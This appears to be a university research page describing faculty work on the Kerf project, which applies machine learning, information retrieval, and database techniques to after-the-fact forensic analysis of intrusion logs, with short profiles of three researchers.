Faculty involved in this effort include:
• Javed Aslam (CCIS)
• Jennifer Dy (ECE)
• Donghui Zhang (CCIS)
A central problem in Information Assurance is host- and network-based intrusion detection and analysis. All sizable computer networks employ host- and network-based sensors to monitor the
health of the network and to detect and/or prevent intrusions. The output of these "sensors" can
be as simple as host and/or network logs, or it may consist of higher-level information such as the
alerts generated by a firewall or intrusion detection system. In real-world settings, the amount of
data that is collected and must be analyzed can be staggering; sophisticated database, data mining,
machine learning, and information retrieval tools are necessary to intelligently process such data.
Javed Aslam's primary research areas are Machine Learning and Information Retrieval, and for three years he has been involved in the Kerf project whose goal is to apply tools from Machine
Learning and Information Retrieval to the problem of the forensic analysis of host- and network-
based logs.
Specifically, the thesis of the Kerf project is that regardless of the quality of an intrusion-detection system, human experts are still necessary to analyze intrusion alerts and to determine the
nature of an attack. Human experts are also the key tool for identifying, tracking, and disabling
new forms of attack. Often this involves experts from many organizations working together to share
their observations, hypotheses, and attack signatures. Unfortunately, today these experts have few
tools that help them to automate this process.
Unlike numerous intrusion-detection tools in existence, designed for real-time system and net-work monitoring, the focus of the Kerf project is on intrusion analysis after the fact, where the
challenge is finding all data relevant to an intrusion in large amounts of logged data in order to
hypothesize the full chain of intrusion events. The goal of the Kerf project is to build automated
tools for computer experts and system administrators are:
| 1. |
Identify the characteristics of an attack given data from host- and network-based sensors. |
| 2. |
Develop a hypothesis about the nature and origin of the attack. |
| 3 |
Assist the user by automatically refining and extrapolating that hypothesis. |
| 4 |
Share that hypothesis with security managers from other sites. |
| 5 |
Test that hypothesis at those other sites and coordinate the results of testing. |
| 6 |
Archive the data necessary for use as evidence in later law enforcement actions. |
Donghui Zhang and Jennifer Dy also conduct research which is highly relevant to problems in Information Assurance. Donghui Zhang's primary research area is Database Systems. In particular,
his research interests include temporal, spatial, and spatio-temporal database indexing; aggregation
queries and join processing; efficiently storing and querying XML documents which evolve
over time; data streaming; and mining generalized association rules. Given the volume of data that
is collected by host- and network-based systems, the efficient support of various data mining and
retrieval operations is critical, necessitating the study of the above techniques.
Jennifer Dy's primary research areas are Data Mining and Machine Learning, including probabilistic clustering and image retrieval. The techniques that she studies can be applied to automatic
data organization, data cleaning, and anomaly detection, and Data Mining and Machine Learning
techniques in general are highly relevant to the problems of intrusion detection and analysis from
vast quantities of sensor data.
| 
